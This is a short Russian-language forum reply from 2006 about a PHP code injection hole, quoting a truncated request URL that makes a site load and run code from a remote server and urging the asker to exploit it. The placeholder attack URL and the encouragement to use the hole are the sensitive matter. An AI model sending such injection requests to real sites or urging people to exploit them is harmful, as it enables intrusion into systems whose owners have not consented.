Показать сообщение отдельно

  #4  
Старый 19.02.2006, 20:52
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting...ttp://wwwwwwww/
позволяет атакующему выполнять произвольный код, взятый с удаленного сервера.

Ну раз есть такая дыра, то можно судя по всему выполнять команды. Ну вот эту брешь и юзай! Почитай статьи про php source injection и будет тебе счастье.
 
Ответить с цитированием